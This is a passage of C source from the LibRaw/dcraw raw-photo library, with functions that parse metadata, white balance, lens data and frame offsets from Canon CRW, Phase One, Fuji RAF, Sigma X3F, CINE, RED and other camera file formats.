imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][3] =
imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][1] = imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][3] = 0x100;
}
break;
#endif
case 0x574247: /* WBG */
get4();
i = strcmp(model,"DiMAGE A200") ? 0:3;
FORC4 cam_mul[c ^ (c >> 1) ^ i] = get2();
break;
case 0x545457: /* TTW */
parse_tiff (ftell(ifp));
data_offset = offset;
}
fseek (ifp, save+len+8, SEEK_SET);
}
raw_height = high;
raw_width = wide;
order = sorder;
}
/*
Many cameras have a "debug mode" that writes JPEG and raw
at the same time. The raw file has no header, so try to
open the matching JPEG file and read its metadata.
*/
void CLASS parse_external_jpeg()
{
const char *file, *ext;
char *jname, *jfile, *jext;
#ifndef LIBRAW_LIBRARY_BUILD
FILE *save=ifp;
#else
#if defined(_WIN32) && !defined(__MINGW32__) && defined(_MSC_VER) && (_MSC_VER > 1310)
if(ifp->wfname())
{
std::wstring rawfile(ifp->wfname());
rawfile.replace(rawfile.length()-3,3,L"JPG");
if(!ifp->subfile_open(rawfile.c_str()))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
if(!ifp->fname())
{
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
return;
}
#endif
ext = strrchr (ifname, '.');
file = strrchr (ifname, '/');
if (!file) file = strrchr (ifname, '\\');
#ifndef LIBRAW_LIBRARY_BUILD
if (!file) file = ifname-1;
#else
if (!file) file = (char*)ifname-1;
#endif
file++;
if (!ext || strlen(ext) != 4 || ext-file != 8) return;
jname = (char *) malloc (strlen(ifname) + 1);
merror (jname, "parse_external_jpeg()");
strcpy (jname, ifname);
jfile = file - ifname + jname;
jext = ext - ifname + jname;
if (strcasecmp (ext, ".jpg")) {
strcpy (jext, isupper(ext[1]) ? ".JPG":".jpg");
if (isdigit(*file)) {
memcpy (jfile, file+4, 4);
memcpy (jfile+4, file, 4);
}
} else
while (isdigit(*--jext)) {
if (*jext != '9') {
(*jext)++;
break;
}
*jext = '0';
}
#ifndef LIBRAW_LIBRARY_BUILD
if (strcmp (jname, ifname)) {
if ((ifp = fopen (jname, "rb"))) {
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Reading metadata from %s ...\n"), jname);
#endif
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
fclose (ifp);
}
}
#else
if (strcmp (jname, ifname))
{
if(!ifp->subfile_open(jname))
{
parse_tiff (12);
thumb_offset = 0;
is_raw = 1;
ifp->subfile_close();
}
else
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
}
#endif
if (!timestamp)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_METADATA ;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("Failed to read metadata from %s\n"), jname);
#endif
}
free (jname);
#ifndef LIBRAW_LIBRARY_BUILD
ifp = save;
#endif
}
/*
CIFF block 0x1030 contains an 8x8 white sample.
Load this into white[][] for use in scale_colors().
*/
void CLASS ciff_block_1030()
{
static const ushort key[] = { 0x410, 0x45f3 };
int i, bpp, row, col, vbits=0;
unsigned long bitbuf=0;
if ((get2(),get4()) != 0x80008 || !get4()) return;
bpp = get2();
if (bpp != 10 && bpp != 12) return;
for (i=row=0; row < 8; row++)
for (col=0; col < 8; col++) {
if (vbits < bpp) {
bitbuf = bitbuf << 16 | (get2() ^ key[i++ & 1]);
vbits += 16;
}
white[row][col] = bitbuf >> (vbits -= bpp) & ~(-1 << bpp);
}
}
/*
Parse a CIFF file, better known as Canon CRW format.
*/
void CLASS parse_ciff (int offset, int length, int depth)
{
int tboff, nrecs, c, type, len, save, wbi=-1;
ushort key[] = { 0x410, 0x45f3 };
fseek (ifp, offset+length-4, SEEK_SET);
tboff = get4() + offset;
fseek (ifp, tboff, SEEK_SET);
nrecs = get2();
if ((nrecs | depth) > 127) return;
while (nrecs--) {
type = get2();
len = get4();
save = ftell(ifp) + 4;
fseek (ifp, offset+get4(), SEEK_SET);
if ((((type >> 8) + 8) | 8) == 0x38) {
parse_ciff (ftell(ifp), len, depth+1); /* Parse a sub-table */
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x3004) parse_ciff (ftell(ifp), len, depth+1);
#endif
if (type == 0x0810)
fread (artist, 64, 1, ifp);
if (type == 0x080a) {
fread (make, 64, 1, ifp);
fseek (ifp, strbuflen(make) - 63, SEEK_CUR);
fread (model, 64, 1, ifp);
}
if (type == 0x1810) {
width = get4();
height = get4();
pixel_aspect = int_to_float(get4());
flip = get4();
}
if (type == 0x1835) /* Get the decoder table */
tiff_compress = get4();
if (type == 0x2007) {
thumb_offset = ftell(ifp);
thumb_length = len;
}
if (type == 0x1818) {
shutter = libraw_powf64(2.0f, -int_to_float((get4(),get4())));
aperture = libraw_powf64(2.0f, int_to_float(get4())/2);
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurAp = aperture;
#endif
}
if (type == 0x102a) {
// iso_speed = pow (2.0, (get4(),get2())/32.0 - 4) * 50;
iso_speed = libraw_powf64(2.0f, ((get2(),get2()) + get2())/32.0f - 5.0f) * 100.0f;
#ifdef LIBRAW_LIBRARY_BUILD
aperture = _CanonConvertAperture((get2(),get2()));
imgdata.lens.makernotes.CurAp = aperture;
#else
aperture = libraw_powf64(2.0, (get2(),(short)get2())/64.0);
#endif
shutter = libraw_powf64(2.0,-((short)get2())/32.0);
wbi = (get2(),get2());
if (wbi > 17) wbi = 0;
fseek (ifp, 32, SEEK_CUR);
if (shutter > 1e6) shutter = get2()/10.0;
}
if (type == 0x102c) {
if (get2() > 512) { /* Pro90, G1 */
fseek (ifp, 118, SEEK_CUR);
FORC4 cam_mul[c ^ 2] = get2();
} else { /* G2, S30, S40 */
fseek (ifp, 98, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2();
}
}
#ifdef LIBRAW_LIBRARY_BUILD
if (type == 0x10a9)
{
INT64 o = ftell(ifp);
fseek (ifp, (0x5<<1), SEEK_CUR);
Canon_WBpresets(0,0);
fseek(ifp,o,SEEK_SET);
}
if (type == 0x102d)
{
INT64 o = ftell(ifp);
Canon_CameraSettings();
fseek(ifp,o,SEEK_SET);
}
if (type == 0x580b)
{
if (strcmp(model,"Canon EOS D30")) sprintf(imgdata.shootinginfo.BodySerial, "%d", len);
else sprintf(imgdata.shootinginfo.BodySerial, "%0x-%05d", len>>16, len&0xffff);
}
#endif
if (type == 0x0032) {
if (len == 768) { /* EOS D30 */
fseek (ifp, 72, SEEK_CUR);
FORC4
{
ushort q = get2();
cam_mul[c ^ (c >> 1)] = q? 1024.0 / get2() : 1024;
}
if (!wbi) cam_mul[0] = -1; /* use my auto white balance */
} else if (!cam_mul[0]) {
if (get2() == key[0]) /* Pro1, G6, S60, S70 */
c = (strstr(model,"Pro1") ?
"012346000000000000":"01345:000000006008")[LIM(0,wbi,17)]-'0'+ 2;
else { /* G3, G5, S45, S50 */
c = "023457000000006000"[LIM(0,wbi,17)]-'0';
key[0] = key[1] = 0;
}
fseek (ifp, 78 + c*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1) ^ 1] = get2() ^ key[c & 1];
if (!wbi) cam_mul[0] = -1;
}
}
if (type == 0x10a9) { /* D60, 10D, 300D, and clones */
if (len > 66) wbi = "0134567028"[LIM(0,wbi,9)]-'0';
fseek (ifp, 2 + wbi*8, SEEK_CUR);
FORC4 cam_mul[c ^ (c >> 1)] = get2();
}
if (type == 0x1030 && wbi>=0 && (0x18040 >> wbi & 1))
ciff_block_1030(); /* all that don't have 0x10a9 */
if (type == 0x1031) {
raw_width = (get2(),get2());
raw_height = get2();
}
if (type == 0x501c) {
iso_speed = len & 0xffff;
}
if (type == 0x5029) {
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CurFocal = len >> 16;
imgdata.lens.makernotes.FocalType = len & 0xffff;
if (imgdata.lens.makernotes.FocalType == 2) {
imgdata.lens.makernotes.CanonFocalUnits = 32;
if(imgdata.lens.makernotes.CanonFocalUnits>1)
imgdata.lens.makernotes.CurFocal /= (float)imgdata.lens.makernotes.CanonFocalUnits;
}
focal_len = imgdata.lens.makernotes.CurFocal;
#else
focal_len = len >> 16;
if ((len & 0xffff) == 2) focal_len /= 32;
#endif
}
if (type == 0x5813) flash_used = int_to_float(len);
if (type == 0x5814) canon_ev = int_to_float(len);
if (type == 0x5817) shot_order = len;
if (type == 0x5834)
{
unique_id = len;
#ifdef LIBRAW_LIBRARY_BUILD
setCanonBodyFeatures(unique_id);
#endif
}
if (type == 0x580e) timestamp = len;
if (type == 0x180e) timestamp = get4();
#ifdef LOCALTIME
if ((type | 0x4000) == 0x580e)
timestamp = mktime (gmtime (&timestamp));
#endif
fseek (ifp, save, SEEK_SET);
}
}
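/*
Rollei d530flex files start with a plain-text header of "KEY=value"
lines (DAT, TIM, HDR, X, Y, TX, TY) terminated by "EOHD".
*/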
void CLASS parse_rollei()
{
char line[128], *val;
struct tm t;
fseek (ifp, 0, SEEK_SET);
memset (&t, 0, sizeof t);
do {
fgets (line, 128, ifp);
if ((val = strchr(line,'=')))
*val++ = 0;
else
val = line + strbuflen(line);
if (!strcmp(line,"DAT"))
sscanf (val, "%d.%d.%d", &t.tm_mday, &t.tm_mon, &t.tm_year);
if (!strcmp(line,"TIM"))
sscanf (val, "%d:%d:%d", &t.tm_hour, &t.tm_min, &t.tm_sec);
if (!strcmp(line,"HDR"))
thumb_offset = atoi(val);
if (!strcmp(line,"X "))
raw_width = atoi(val);
if (!strcmp(line,"Y "))
raw_height = atoi(val);
if (!strcmp(line,"TX "))
thumb_width = atoi(val);
if (!strcmp(line,"TY "))
thumb_height = atoi(val);
} while (strncmp(line,"EOHD",4));
data_offset = thumb_offset + thumb_width * thumb_height * 2;
t.tm_year -= 1900;
t.tm_mon -= 1;
if (mktime(&t) > 0)
timestamp = mktime(&t);
strcpy (make, "Rollei");
strcpy (model,"d530flex");
write_thumb = &CLASS rollei_thumb;
}
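/*
Sinar IA: a little-endian directory of named entries; "META", "THUMB"
and "RAW0" give the offsets of metadata, thumbnail and raw data.
*/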
void CLASS parse_sinar_ia()
{
int entries, off;
char str[8], *cp;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
entries = get4();
fseek (ifp, get4(), SEEK_SET);
while (entries--) {
off = get4(); get4();
fread (str, 8, 1, ifp);
if (!strcmp(str,"META")) meta_offset = off;
if (!strcmp(str,"THUMB")) thumb_offset = off;
if (!strcmp(str,"RAW0")) data_offset = off;
}
fseek (ifp, meta_offset+20, SEEK_SET);
fread (make, 64, 1, ifp);
make[63] = 0;
if ((cp = strchr(make,' '))) {
strcpy (model, cp+1);
*cp = 0;
}
raw_width = get2();
raw_height = get2();
load_raw = &CLASS unpacked_load_raw;
thumb_width = (get4(),get2());
thumb_height = get2();
write_thumb = &CLASS ppm_thumb;
maximum = 0x3fff;
}
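/*
Phase One IIQ metadata: a directory of tag/type/length/data entries
describing geometry, black level layout, the ROMM-to-camera matrix
and white balance.
*/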
void CLASS parse_phase_one (int base)
{
unsigned entries, tag, type, len, data, save, i, c;
float romm_cam[3][3];
char *cp;
memset (&ph1, 0, sizeof ph1);
fseek (ifp, base, SEEK_SET);
order = get4() & 0xffff;
if (get4() >> 8 != 0x526177) return; /* "Raw" */
fseek (ifp, get4()+base, SEEK_SET);
entries = get4();
get4();
while (entries--) {
tag = get4();
type = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, base+data, SEEK_SET);
switch (tag) {
#ifdef LIBRAW_LIBRARY_BUILD
case 0x0102:
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
break;
case 0x0401:
if (type == 4) imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
else imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, (getreal(type)/2.0f));
break;
case 0x0403:
if (type == 4) imgdata.lens.makernotes.CurFocal = int_to_float(data);
else imgdata.lens.makernotes.CurFocal = getreal(type);
break;
case 0x0410:
stmread(imgdata.lens.makernotes.body, len, ifp);
break;
case 0x0412:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x0414:
if (type == 4) {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0415:
if (type == 4) {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (int_to_float(data)/2.0f));
} else {
imgdata.lens.makernotes.MinAp4CurFocal = libraw_powf64(2.0f, (getreal(type) / 2.0f));
}
break;
case 0x0416:
if (type == 4) {
imgdata.lens.makernotes.MinFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MinFocal = getreal(type);
}
if (imgdata.lens.makernotes.MinFocal > 1000.0f)
{
imgdata.lens.makernotes.MinFocal = 0.0f;
}
break;
case 0x0417:
if (type == 4) {
imgdata.lens.makernotes.MaxFocal = int_to_float(data);
} else {
imgdata.lens.makernotes.MaxFocal = getreal(type);
}
break;
#endif
case 0x100: flip = "0653"[data & 3]-'0'; break;
case 0x106:
for (i=0; i < 9; i++)
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.color.P1_color[0].romm_cam[i]=
#endif
((float *)romm_cam)[i] = getreal(11);
romm_coeff (romm_cam);
break;
case 0x107:
FORC3 cam_mul[c] = getreal(11);
break;
case 0x108: raw_width = data; break;
case 0x109: raw_height = data; break;
case 0x10a: left_margin = data; break;
case 0x10b: top_margin = data; break;
case 0x10c: width = data; break;
case 0x10d: height = data; break;
case 0x10e: ph1.format = data; break;
case 0x10f: data_offset = data+base; break;
case 0x110: meta_offset = data+base;
meta_length = len; break;
case 0x112: ph1.key_off = save - 4; break;
case 0x210: ph1.tag_210 = int_to_float(data); break;
case 0x21a: ph1.tag_21a = data; break;
case 0x21c: strip_offset = data+base; break;
case 0x21d: ph1.t_black = data; break;
case 0x222: ph1.split_col = data; break;
case 0x223: ph1.black_col = data+base; break;
case 0x224: ph1.split_row = data; break;
case 0x225: ph1.black_row = data+base; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 0x226:
for (i=0; i < 9; i++)
imgdata.color.P1_color[1].romm_cam[i] = getreal(11);
break;
#endif
case 0x301:
model[63] = 0;
fread (model, 1, 63, ifp);
if ((cp = strstr(model," camera"))) *cp = 0;
}
fseek (ifp, save, SEEK_SET);
}
#ifdef LIBRAW_LIBRARY_BUILD
if (!imgdata.lens.makernotes.body[0] && !imgdata.shootinginfo.BodySerial[0]) {
fseek (ifp, meta_offset, SEEK_SET);
order = get2();
fseek (ifp, 6, SEEK_CUR);
fseek (ifp, meta_offset+get4(), SEEK_SET);
entries = get4(); get4();
while (entries--) {
tag = get4();
len = get4();
data = get4();
save = ftell(ifp);
fseek (ifp, meta_offset+data, SEEK_SET);
if (tag == 0x0407) {
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
if ((imgdata.shootinginfo.BodySerial[0] == 0x4c) && (imgdata.shootinginfo.BodySerial[1] == 0x49)) {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[2] & 0x3f)) - 0x41;
} else {
unique_id = (((imgdata.shootinginfo.BodySerial[0] & 0x3f) << 5) | (imgdata.shootinginfo.BodySerial[1] & 0x3f)) - 0x41;
}
setPhaseOneFeatures(unique_id);
}
fseek (ifp, save, SEEK_SET);
}
}
#endif
load_raw = ph1.format < 3 ?
&CLASS phase_one_load_raw : &CLASS phase_one_load_raw_c;
maximum = 0xffff;
strcpy (make, "Phase One");
if (model[0]) return;
switch (raw_height) {
case 2060: strcpy (model,"LightPhase"); break;
case 2682: strcpy (model,"H 10"); break;
case 4128: strcpy (model,"H 20"); break;
case 5488: strcpy (model,"H 25"); break;
}
}
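/*
Fujifilm RAF meta table: tag 0x100 gives the raw dimensions, 0x121 the
output size, 0x130 the sensor layout, 0x131 the X-Trans CFA pattern and
0x2ff0 the as-shot white balance.
*/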
void CLASS parse_fuji (int offset)
{
unsigned entries, tag, len, save, c;
fseek (ifp, offset, SEEK_SET);
entries = get4();
if (entries > 255)
return;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_PARSEFUJI_PROCESSED;
#endif
while (entries--)
{
tag = get2();
len = get2();
save = ftell(ifp);
if (tag == 0x100) {
raw_height = get2();
raw_width = get2();
} else if (tag == 0x121) {
height = get2();
if ((width = get2()) == 4284) width += 3;
} else if (tag == 0x130) {
fuji_layout = fgetc(ifp) >> 7;
fuji_width = !(fgetc(ifp) & 8);
} else if (tag == 0x131) {
filters = 9;
FORC(36)
{
int q = fgetc(ifp);
xtrans_abs[0][35 - c] = MAX(0,MIN(q,2)); /* & 3;*/
}
} else if (tag == 0x2ff0) {
FORC4 cam_mul[c ^ 1] = get2();
}
// IB start
#ifdef LIBRAW_LIBRARY_BUILD
else if (tag == 0x9650)
{
short a = (short)get2();
float b =fMAX(1.0f, get2());
imgdata.makernotes.fuji.FujiExpoMidPointShift = a / b;
} else if (tag == 0x2100) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ 1] = get2();
} else if (tag == 0x2200) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ 1] = get2();
} else if (tag == 0x2300) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ 1] = get2();
} else if (tag == 0x2301) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ 1] = get2();
} else if (tag == 0x2302) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_WW][c ^ 1] = get2();
} else if (tag == 0x2310) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ 1] = get2();
} else if (tag == 0x2400) {
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ 1] = get2();
}
#endif
// IB end
else if (tag == 0xc000) {
c = order;
order = 0x4949;
if ((tag = get4()) > 10000) tag = get4();
if (tag > 10000) tag = get4();
width = tag;
height = get4();
#ifdef LIBRAW_LIBRARY_BUILD
libraw_internal_data.unpacker_data.posRAFData = save;
libraw_internal_data.unpacker_data.lenRAFData = (len>>1);
#endif
order = c;
}
fseek (ifp, save+len, SEEK_SET);
}
height <<= fuji_layout;
width >>= fuji_layout;
}
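/*
Scan JPEG markers: SOF segments give the raw dimensions, and an APP
segment containing a CIFF "HEAP" or a TIFF header is parsed for metadata.
*/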
int CLASS parse_jpeg (int offset)
{
int len, save, hlen, mark;
fseek (ifp, offset, SEEK_SET);
if (fgetc(ifp) != 0xff || fgetc(ifp) != 0xd8) return 0;
while (fgetc(ifp) == 0xff && (mark = fgetc(ifp)) != 0xda) {
order = 0x4d4d;
len = get2() - 2;
save = ftell(ifp);
if (mark == 0xc0 || mark == 0xc3 || mark == 0xc9) {
fgetc(ifp);
raw_height = get2();
raw_width = get2();
}
order = get2();
hlen = get4();
if (get4() == 0x48454150
#ifdef LIBRAW_LIBRARY_BUILD
&& (save+hlen) >= 0 && (save+hlen)<=ifp->size()
#endif
) /* "HEAP" */
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (save+hlen, len-hlen, 0);
}
if (parse_tiff (save+6)) apply_tiff();
fseek (ifp, save+len, SEEK_SET);
}
return 1;
}
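/*
Walk RIFF/AVI chunks recursively; "nctg" and "IDIT" chunks carry the
capture timestamp.
*/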
void CLASS parse_riff()
{
unsigned i, size, end;
char tag[4], date[64], month[64];
static const char mon[12][4] =
{ "Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec" };
struct tm t;
order = 0x4949;
fread (tag, 4, 1, ifp);
size = get4();
end = ftell(ifp) + size;
if (!memcmp(tag,"RIFF",4) || !memcmp(tag,"LIST",4)) {
int maxloop = 1000;
get4();
while (ftell(ifp)+7 < end && !feof(ifp) && maxloop--)
parse_riff();
} else if (!memcmp(tag,"nctg",4)) {
while (ftell(ifp)+7 < end) {
i = get2();
size = get2();
if ((i+1) >> 1 == 10 && size == 20)
get_timestamp(0);
else fseek (ifp, size, SEEK_CUR);
}
} else if (!memcmp(tag,"IDIT",4) && size < 64) {
fread (date, 64, 1, ifp);
date[size] = 0;
memset (&t, 0, sizeof t);
if (sscanf (date, "%*s %s %d %d:%d:%d %d", month, &t.tm_mday,
&t.tm_hour, &t.tm_min, &t.tm_sec, &t.tm_year) == 6) {
for (i=0; i < 12 && strcasecmp(mon[i],month); i++);
t.tm_mon = i;
t.tm_year -= 1900;
if (mktime(&t) > 0)
timestamp = mktime(&t);
}
} else
fseek (ifp, size, SEEK_CUR);
}
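/*
Walk QuickTime atoms; "CNDA" atoms contain an embedded JPEG whose
metadata is parsed with parse_jpeg().
*/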
void CLASS parse_qt (int end)
{
unsigned save, size;
char tag[4];
order = 0x4d4d;
while (ftell(ifp)+7 < end) {
save = ftell(ifp);
if ((size = get4()) < 8) return;
fread (tag, 4, 1, ifp);
if (!memcmp(tag,"moov",4) ||
!memcmp(tag,"udta",4) ||
!memcmp(tag,"CNTH",4))
parse_qt (save+size);
if (!memcmp(tag,"CNDA",4))
parse_jpeg (ftell(ifp));
fseek (ifp, save+size, SEEK_SET);
}
}
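/*
SMaL raw: a small header holding the format version, a file-size check
and the image dimensions.
*/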
void CLASS parse_smal (int offset, int fsize)
{
int ver;
fseek (ifp, offset+2, SEEK_SET);
order = 0x4949;
ver = fgetc(ifp);
if (ver == 6)
fseek (ifp, 5, SEEK_CUR);
if (get4() != fsize) return;
if (ver > 6) data_offset = get4();
raw_height = height = get2();
raw_width = width = get2();
strcpy (make, "SMaL");
sprintf (model, "v%d %dx%d", ver, width, height);
if (ver == 6) load_raw = &CLASS smal_v6_load_raw;
if (ver == 9) load_raw = &CLASS smal_v9_load_raw;
}
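/*
CINE video format: read geometry, CFA pattern, orientation, white
balance and exposure from the header, then locate the selected frame.
*/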
void CLASS parse_cine()
{
unsigned off_head, off_setup, off_image, i;
order = 0x4949;
fseek (ifp, 4, SEEK_SET);
is_raw = get2() == 2;
fseek (ifp, 14, SEEK_CUR);
is_raw *= get4();
off_head = get4();
off_setup = get4();
off_image = get4();
timestamp = get4();
if ((i = get4())) timestamp = i;
fseek (ifp, off_head+4, SEEK_SET);
raw_width = get4();
raw_height = get4();
switch (get2(),get2()) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 16: load_raw = &CLASS unpacked_load_raw;
}
fseek (ifp, off_setup+792, SEEK_SET);
strcpy (make, "CINE");
sprintf (model, "%d", get4());
fseek (ifp, 12, SEEK_CUR);
switch ((i=get4()) & 0xffffff) {
case 3: filters = 0x94949494; break;
case 4: filters = 0x49494949; break;
default: is_raw = 0;
}
fseek (ifp, 72, SEEK_CUR);
switch ((get4()+3600) % 360) {
case 270: flip = 4; break;
case 180: flip = 1; break;
case 90: flip = 7; break;
case 0: flip = 2;
}
cam_mul[0] = getreal(11);
cam_mul[2] = getreal(11);
maximum = ~((~0u) << get4());
fseek (ifp, 668, SEEK_CUR);
shutter = get4()/1000000000.0;
fseek (ifp, off_image, SEEK_SET);
if (shot_select < is_raw)
fseek (ifp, shot_select*8, SEEK_CUR);
data_offset = (INT64) get4() + 8;
data_offset += (INT64) get4() << 32;
}
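/*
RED R3D (REDCODE): frame offsets normally come from the trailing index
block; if the tail is missing, scan the file from the start.
*/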
void CLASS parse_redcine()
{
unsigned i, len, rdvo;
order = 0x4d4d;
is_raw = 0;
fseek (ifp, 52, SEEK_SET);
width = get4();
height = get4();
fseek (ifp, 0, SEEK_END);
fseek (ifp, -(i = ftello(ifp) & 511), SEEK_CUR);
if (get4() != i || get4() != 0x52454f42) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: Tail is missing, parsing from head...\n"), ifname);
#endif
fseek (ifp, 0, SEEK_SET);
while ((len = get4()) != EOF) {
if (get4() == 0x52454456)
if (is_raw++ == shot_select)
data_offset = ftello(ifp) - 8;
fseek (ifp, len-8, SEEK_CUR);
}
} else {
rdvo = get4();
fseek (ifp, 12, SEEK_CUR);
is_raw = get4();
fseeko (ifp, rdvo+8 + shot_select*4, SEEK_SET);
data_offset = get4();
}
}
//@end COMMON
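/* Read a little-endian 16-bit-per-character string from the file and narrow it to 8-bit. */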
char * CLASS foveon_gets (int offset, char *str, int len)
{
int i;
fseek (ifp, offset, SEEK_SET);
for (i=0; i < len-1; i++)
if ((str[i] = get2()) == 0) break;
str[i] = 0;
return str;
}
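/*
Sigma X3F: walk the "SECd" directory; IMAG/IMA2 sections hold the raw
image and preview, CAMF the metadata, and PROP name/value pairs such as
ISO, CAMMANUF, CAMMODEL and EXPTIME.
*/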
void CLASS parse_foveon()
{
int entries, img=0, off, len, tag, save, i, wide, high, pent, poff[256][2];
char name[64], value[64];
order = 0x4949; /* Little-endian */
fseek (ifp, 36, SEEK_SET);
flip = get4();
fseek (ifp, -4, SEEK_END);
fseek (ifp, get4(), SEEK_SET);
if (get4() != 0x64434553) return; /* SECd */
entries = (get4(),get4());
while (entries--) {
off = get4();
len = get4();
tag = get4();
save = ftell(ifp);
fseek (ifp, off, SEEK_SET);
if (get4() != (0x20434553 | (tag << 24))) return;
switch (tag) {
case 0x47414d49: /* IMAG */
case 0x32414d49: /* IMA2 */
fseek (ifp, 8, SEEK_CUR);
pent = get4();
wide = get4();
high = get4();
if (wide > raw_width && high > raw_height) {
switch (pent) {
case 5: load_flags = 1;
case 6: load_raw = &CLASS foveon_sd_load_raw; break;
case 30: load_raw = &CLASS foveon_dp_load_raw; break;
default: load_raw = 0;
}
raw_width = wide;
raw_height = high;
data_offset = off+28;
is_foveon = 1;
}
fseek (ifp, off+28, SEEK_SET);
if (fgetc(ifp) == 0xff && fgetc(ifp) == 0xd8
&& thumb_length < len-28) {
thumb_offset = off+28;
thumb_length = len-28;
write_thumb = &CLASS jpeg_thumb;
}
if (++img == 2 && !thumb_length) {
thumb_offset = off+24;
thumb_width = wide;
thumb_height = high;
write_thumb = &CLASS foveon_thumb;
}
break;
case 0x464d4143: /* CAMF */
meta_offset = off+8;
meta_length = len-28;
break;
case 0x504f5250: /* PROP */
pent = (get4(),get4());
fseek (ifp, 12, SEEK_CUR);
off += pent*8 + 24;
if ((unsigned) pent > 256) pent=256;
for (i=0; i < pent*2; i++)
((int *)poff)[i] = off + get4()*2;
for (i=0; i < pent; i++) {
foveon_gets (poff[i][0], name, 64);
foveon_gets (poff[i][1], value, 64);
if (!strcmp (name, "ISO"))
iso_speed = atoi(value);
if (!strcmp (name, "CAMMANUF"))
strcpy (make, value);
if (!strcmp (name, "CAMMODEL"))
strcpy (model, value);
if (!strcmp (name, "WB_DESC"))
strcpy (model2, value);
if (!strcmp (name, "TIME"))
timestamp = atoi(value);
if (!strcmp (name, "EXPTIME"))
shutter = atoi(value) / 1000000.0;
if (!strcmp (name, "APERTURE"))
aperture = atof(value);
if (!strcmp (name, "FLENGTH"))
focal_len = atof(value);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strcmp (name, "CAMSERIAL"))
strcpy (imgdata.shootinginfo.BodySerial, value);
if (!strcmp (name, "FLEQ35MM"))
imgdata.lens.makernotes.FocalLengthIn35mmFormat = atof(value);
if (!strcmp (name, "LENSARANGE"))
{
char *sp;
imgdata.lens.makernotes.MaxAp4CurFocal = imgdata.lens.makernotes.MinAp4CurFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MinAp4CurFocal = atof(sp);
if (imgdata.lens.makernotes.MaxAp4CurFocal > imgdata.lens.makernotes.MinAp4CurFocal)
my_swap (float, imgdata.lens.makernotes.MaxAp4CurFocal, imgdata.lens.makernotes.MinAp4CurFocal);
}
}
if (!strcmp (name, "LENSFRANGE"))
{
char *sp;
imgdata.lens.makernotes.MinFocal = imgdata.lens.makernotes.MaxFocal = atof(value);
sp = strrchr (value, ' ');
if (sp)
{
imgdata.lens.makernotes.MaxFocal = atof(sp);
if ((imgdata.lens.makernotes.MaxFocal + 0.17f) < imgdata.lens.makernotes.MinFocal)
my_swap (float, imgdata.lens.makernotes.MaxFocal, imgdata.lens.makernotes.MinFocal);
}
}
if (!strcmp (name, "LENSMODEL"))
{
char *sp;
imgdata.lens.makernotes.LensID = strtol (value, &sp, 16); // atoi(value);
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = Sigma_X3F;
}
}
#endif
}
#ifdef LOCALTIME
timestamp = mktime (gmtime (&timestamp));
#endif
}
fseek (ifp, save, SEEK_SET);
}
}
//@out COMMON
/*
